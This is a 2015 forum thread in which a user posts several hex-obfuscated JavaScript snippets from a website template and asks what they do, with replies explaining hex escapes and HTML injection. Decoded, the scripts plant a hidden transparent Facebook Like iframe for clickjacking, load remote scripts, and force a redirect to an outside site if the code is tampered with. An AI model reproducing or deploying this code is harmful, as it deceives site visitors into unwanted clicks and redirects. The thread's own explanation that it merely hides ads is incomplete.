1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Can Someone Please Shed Some Light on These Creepy Scripts?

Discussion in 'BlackHat Lounge' started by UniqueProblemSolver, Mar 18, 2015.

  1. UniqueProblemSolver

    UniqueProblemSolver Newbie

    Joined:
    Oct 3, 2014
    Messages:
    16
    Likes Received:
    9
    Occupation:
    Student
    Location:
    Tetouan/Morocco
    Home Page:
    <script type='text/javascript'>var _0xe8fe=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x62\x61\x6E\x20\x7B\x20\x77\x69\x64\x74\x68\x3A\x20\x33\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x35\x30\x70\x78\x3B\x20\x7D\x20\x40\x6D\x65\x64\x69\x61\x28\x6D\x69\x6E\x2D\x77\x69\x64\x74\x68\x3A\x20\x35\x30\x30\x70\x78\x29\x20\x7B\x20\x2E\x62\x61\x6E\x20\x7B\x20\x77\x69\x64\x74\x68\x3A\x20\x34\x36\x38\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x70\x78\x3B\x20\x7D\x20\x7D\x20\x40\x6D\x65\x64\x69\x61\x28\x6D\x69\x6E\x2D\x77\x69\x64\x74\x68\x3A\x20\x38\x30\x30\x70\x78\x29\x20\x7B\x20\x2E\x62\x61\x6E\x20\x7B\x20\x77\x69\x64\x74\x68\x3A\x20\x37\x32\x38\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x39\x30\x70\x78\x3B\x20\x7D\x20\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x69\x64\x3D\x27\x62\x61\x6E\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x62\x61\x6E\x27\x20\x3E\x3C\x73\x63\x72","\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x73\x63\x72","\x69\x70\x74\x3E\x3C\x69\x6E\x73\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x27\x20\x73\x74\x79\x6C\x65\x3D\x27\x64\x69\x73\x70\x6C\x61\x79\x3A\x62\x6C\x6F\x63\x6B\x27\x20\x64\x61\x74\x61\x2D\x61\x64\x2D\x63\x6C\x69\x65\x6E\x74\x3D\x27","\x27\x20\x64\x61\x74\x61\x2D\x61\x64\x2D\x73\x6C\x6F\x74\x3D\x27","\x27\x20\x64\x61\x74\x61\x2D\x61\x64\x2D\x66\x6F\x72\x6D\x61\x74\x3D\x27\x61\x75\x74\x6F\x27\x3E\x3C\x2F\x69\x6E\x73\x3E\x3C\x73\x63\x72","\x69\x70\x74\x3E\x28\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x20\x7C\x7C\x20\x5B\x5D\x29\x2E\x70\x75\x73\x68\x28\x7B\x7D\x29\x3B\x3C\x2F\x73\x63\x72","\x69\x70\x74\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe8fe[1]](_0xe8fe[0]);document[_0xe8fe[1]](_0xe8fe[2]+_0xe8fe[3]+ads+_0xe8fe[4]+_0xe8fe[5]+pub+_0xe8fe[6]+slotauto+_0xe8fe[7]+_0xe8fe[8]+_0xe8fe[9]);</script>





    Can anyone please explain to me the meaning of these scripts:




    [/PHP]


    <script type='text/javascript'>
    var _0x6e58=["\x3C\x73\x63\x72","\x69\x70\x74\x20\x74\x79\x70\x 65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73 \x63\x72\x69\x70\x74\x27\x27\x20\x73\x72\x63\x3D\x 27","\x27\x3E\x3C\x2F\x73\x63\x72","\x69\x70\x74\x 3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x 69\x64\x3D\x27\x64\x66\x62\x27\x20\x63\x6C\x61\x73 \x73\x3D\x27\x64\x66\x62\x27\x3E\x3C\x69\x66\x72\x 61\x6D\x65\x20\x73\x72\x63\x3D\x27\x2F\x2F\x77\x77 \x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x 6F\x6D\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x6C\x69 \x6B\x65\x2E\x70\x68\x70\x3F\x68\x72\x65\x66\x3D", "\x26\x61\x6D\x70\x3B\x73\x65\x6E\x64\x3D\x66\x61\ x6C\x73\x65\x26\x61\x6D\x70\x3B\x6C\x61\x79\x6F\x7 5\x74\x3D\x62\x75\x74\x74\x6F\x6E\x5F\x63\x6F\x75\ x6E\x74\x26\x61\x6D\x70\x3B\x77\x69\x64\x74\x68\x3 D\x33\x30\x26\x61\x6D\x70\x3B\x73\x68\x6F\x77\x5F\ x66\x61\x63\x65\x73\x3D\x66\x61\x6C\x73\x65\x26\x6 1\x6D\x70\x3B\x66\x6F\x6E\x74\x26\x61\x6D\x70\x3B\ x63\x6F\x6C\x6F\x72\x73\x63\x68\x65\x6D\x65\x3D\x6 C\x69\x67\x68\x74\x26\x61\x6D\x70\x3B\x61\x63\x74\ x69\x6F\x6E\x3D\x6C\x69\x6B\x65\x26\x61\x6D\x70\x3 B\x68\x65\x69\x67\x68\x74\x3D\x32\x31\x27\x20\x73\ x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x27\x6E\x6F\x2 7\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\ x3D\x27\x30\x27\x20\x73\x74\x79\x6C\x65\x3D\x27\x6 2\x6F\x72\x64\x65\x72\x3A\x6E\x6F\x6E\x65\x3B\x20\ x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x6 4\x65\x6E\x3B\x20\x77\x69\x64\x74\x68\x3A\x35\x30\ x70\x78\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x39\x7 0\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x32\x30\ x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x2 0\x39\x39\x39\x39\x39\x39\x3B\x20\x70\x6F\x73\x69\ x74\x69\x6F\x6E\x3A\x20\x72\x65\x6C\x61\x74\x69\x7 6\x65\x3B\x27\x20\x61\x6C\x6C\x6F\x77\x54\x72\x61\ x6E\x73\x70\x61\x72\x65\x6E\x63\x79\x3D\x27\x74\x7 2\x75\x65\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\ x3E\x3C\x2F\x64\x69\x76\x3E","\x3C\x73\x74\x79\x6C \x65\x3E\x2E\x64\x66\x62\x20\x7B\x70\x6F\x73\x69\x 74\x69\x6F\x6E\x3A\x20\x61\x62\x73\x6F\x6C\x75\x74 \x65\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x 66\x74\x3A\x20\x2D\x34\x35\x70\x78\x3B\x20\x7A\x2D \x69\x6E\x64\x65\x78\x3A\x20\x39\x39\x39\x39\x39\x 39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39 \x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x3B\x 20\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x20 \x68\x65\x69\x67\x68\x74\x3A\x32\x30\x70\x78\x3B\x 20\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64 \x64\x65\x6E\x3B\x20\x76\x69\x73\x69\x62\x69\x6C\x 69\x74\x79\x3A\x20\x68\x69\x64\x64\x65\x6E\x3B\x6F \x70\x61\x63\x69\x74\x79\x3A\x20","\x3B\x2D\x6D\x6 F\x7A\x2D\x6F\x70\x61\x63\x69\x74\x79\x20\x3A\x20" ,"\x3B\x2D\x6D\x73\x2D\x66\x69\x6C\x74\x65\x72\x3A \x20\x27\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x63\x 69\x74\x79\x3D","\x29\x27\x3B\x66\x69\x6C\x74\x65\ x72\x3A\x20\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x6 3\x69\x74\x79\x20\x3D\x20","\x29\x3B\x20\x2D\x6D\x 73\x2D\x66\x69\x6C\x74\x65\x72\x3A\x27\x70\x72\x6F \x67\x69\x64\x3A\x44\x58\x49\x6D\x61\x67\x65\x54\x 72\x61\x6E\x73\x66\x6F\x72\x6D\x2E\x4D\x69\x63\x72 \x6F\x73\x6F\x66\x74\x2E\x41\x6C\x70\x68\x61\x28\x 4F\x70\x61\x63\x69\x74\x79\x3D","\x29\x27\x3B\x7D\ x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x68\x74\x74\x70 \x3A\x2F\x2F\x6E\x6F\x62\x65\x6C\x6F\x66\x66\x69\x 63\x65\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E \x63\x6F\x6D","\x75\x6E\x64\x65\x66\x69\x6E\x65\x6 4","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];document[_0x6e58[4]](_0x6e58[0]+_0x6e58[1]+jqr+_0x6e58[2]+_0x6e58[3]);document[_0x6e58[4]](_0x6e58[5]+urlfb+_0x6e58[6]);document[_0x6e58[4]](_0x6e58[7]+opc+_0x6e58[8]+opc+_0x6e58[9]+opc+_0x6e58[10]+opc+_0x6e58[11]+opc+_0x6e58[12]);var chkaurl=_0x6e58[13];if( typeof chka===_0x6e58[14]){window[_0x6e58[15]]=chkaurl;} ;var chkb=2;var chkd=5;
    </script>
    <script type='text/javascript'>
    var _0x5c02=["\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\ x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x6 5\x22\x3E\x3C\x73\x63\x72","\x69\x70\x74\x20\x69\x 64\x3D\x22\x5F\x77\x61\x75\x34\x64\x36\x22\x3E\x76 \x61\x72\x20\x5F\x77\x61\x75\x20\x3D\x20\x5F\x77\x 61\x75\x20\x7C\x7C\x20\x5B\x5D\x3B\x20\x5F\x77\x61 \x75\x2E\x70\x75\x73\x68\x28\x5B\x22\x73\x6D\x61\x 6C\x6C\x22\x2C\x20\x22","\x22\x2C\x20\x22\x34\x64\ x36\x22\x5D\x29\x3B\x28\x66\x75\x6E\x63\x74\x69\x6 F\x6E\x28\x29\x20\x7B\x76\x61\x72\x20\x73\x3D\x64\ x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x7 4\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x22\x73\x63\ x72\x69\x70\x74\x22\x29\x3B\x20\x73\x2E\x61\x73\x7 9\x6E\x63\x3D\x74\x72\x75\x65\x3B\x73\x2E\x73\x72\ x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x6 4\x67\x65\x74\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\ x73\x2F\x73\x6D\x61\x6C\x6C\x2E\x6A\x73\x22\x3B\x6 4\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\ x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4 E\x61\x6D\x65\x28\x22\x68\x65\x61\x64\x22\x29\x5B\ x30\x5D\x2E\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6 C\x64\x28\x73\x29\x3B\x7D\x29\x28\x29\x3B\x3C\x2F\ x73\x63\x72","\x69\x70\x74\x3E\x3C\x2F\x64\x69\x76 \x3E","\x77\x72\x69\x74\x65","\x68\x74\x74\x70\x3A \x2F\x2F\x6E\x6F\x62\x65\x6C\x6F\x66\x66\x69\x63\x 65\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x63 \x6F\x6D","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"," \x6C\x6F\x63\x61\x74\x69\x6F\x6E"];document[_0x5c02[4]](_0x5c02[0]+_0x5c02[1]+amg+_0x5c02[2]+_0x5c02[3]);var chkaurl=_0x5c02[5];if( typeof chkd===_0x5c02[6]){window[_0x5c02[7]]=chkaurl;} ;
    </script>
    <script>
    var _0xe941=["\x73\x63\x72\x69\x70\x74","\x2F\x2F\x77\x77\x77\x 2E\x67\x6F\x6F\x67\x6C\x65\x2D\x61\x6E\x61\x6C\x79 \x74\x69\x63\x73\x2E\x63\x6F\x6D\x2F\x61\x6E\x61\x 6C\x79\x74\x69\x63\x73\x2E\x6A\x73","\x67\x61","\x 47\x6F\x6F\x67\x6C\x65\x41\x6E\x61\x6C\x79\x74\x69 \x63\x73\x4F\x62\x6A\x65\x63\x74","\x6C","\x70\x75 \x73\x68","\x71","\x63\x72\x65\x61\x74\x65\x45\x6C \x65\x6D\x65\x6E\x74","\x67\x65\x74\x45\x6C\x65\x6 D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\ x65","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x69\x 6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\ x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x3C\x73\x63 \x72","\x69\x70\x74\x3E\x20\x20\x67\x61\x28\x27\x6 3\x72\x65\x61\x74\x65\x27\x2C\x20\x27","\x27\x2C\x 20\x27\x61\x75\x74\x6F\x27\x29\x3B\x3C\x2F\x73\x63 \x72","\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\ x73\x65\x6E\x64","\x70\x61\x67\x65\x76\x69\x65\x77 ","\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x6F\x62\x65\x6 C\x6F\x66\x66\x69\x63\x65\x6D\x61\x6E\x61\x67\x65\ x6D\x65\x6E\x74\x2E\x63\x6F\x6D","\x75\x6E\x64\x65 \x66\x69\x6E\x65\x64","\x6C\x6F\x63\x61\x74\x69\x6 F\x6E"];(function (_0xba3ex1,_0xba3ex2,_0xba3ex3,_0xba3ex4,_0xba3ex5 ,_0xba3ex6,_0xba3ex7){_0xba3ex1[_0xe941[3]]=_0xba3ex5;_0xba3ex1[_0xba3ex5]=_0xba3ex1[_0xba3ex5]||function (){(_0xba3ex1[_0xba3ex5][_0xe941[6]]=_0xba3ex1[_0xba3ex5][_0xe941[6]]||[])[_0xe941[5]](arguments);} ,_0xba3ex1[_0xba3ex5][_0xe941[4]]=1* new Date();_0xba3ex6=_0xba3ex2[_0xe941[7]](_0xba3ex3),_0xba3ex7=_0xba3ex2[_0xe941[8]](_0xba3ex3)[0];_0xba3ex6[_0xe941[9]]=1;_0xba3ex6[_0xe941[10]]=_0xba3ex4;_0xba3ex7[_0xe941[12]][_0xe941[11]](_0xba3ex6,_0xba3ex7);} )(window,document,_0xe941[0],_0xe941[1],_0xe941[2]);document[_0xe941[17]](_0xe941[13]+_0xe941[14]+gga+_0xe941[15]+_0xe941[16]);ga(_0xe941[18],_0xe941[19]);var chkaurl=_0xe941[20];if( typeof chkd===_0xe941[21]){window[_0xe941[22]]=chkaurl;} ;
    </script> I apologize if I had put this in the wrong section, but I couldn't post it in "Web Design" because I'm not a Jr. VIP. I would really appreciate your help, guys!
     
  2. pxoxrxn

    pxoxrxn Supreme Member

    Joined:
    Dec 21, 2011
    Messages:
    1,398
    Likes Received:
    2,072
    You should have put this in paste bin. It looks like it just declaring a an array.
     
  3. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,025
    Likes Received:
    10,815
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    Home Page:
    I decoded a similar one for another member here.

    Everyone of those \xSOMETHING is just a hex escape for a UTF-8 character.

    It's an obscured script that injects some HTML into pages. Some of those may not be malicious, but they normally are.
     
  4. Zwielicht

    Zwielicht Moderator Staff Member Moderator Jr. VIP

    Joined:
    Aug 31, 2013
    Messages:
    6,560
    Likes Received:
    11,696
    Gender:
    Male
    Occupation:
    Private Investigator
    Location:
    Riverside, California
    Home Page:
    Next time you want to post a code, there's this little icon that looks like this "#". It helps shorten the code into a separate scrollable box so that it doesn't take up half the page. :)

    Code:
    Example
     
    Last edited: Mar 19, 2015
  5. UniqueProblemSolver

    UniqueProblemSolver Newbie

    Joined:
    Oct 3, 2014
    Messages:
    16
    Likes Received:
    9
    Occupation:
    Student
    Location:
    Tetouan/Morocco
    Home Page:
    Thank you so much everyone! I thought no one replied so I found the solution by being positively stubborn(persistent) as usual. It turned out the guy is encrypting Google Ads, so THEY ARE EXTREMELY MALICIOUS. The guy makes thousands of dollars every month just by spamming. When you see his website, all you see is a top banner ad and 50 posts he posts in his many websites, so every time one gets suspended, he still has other websites.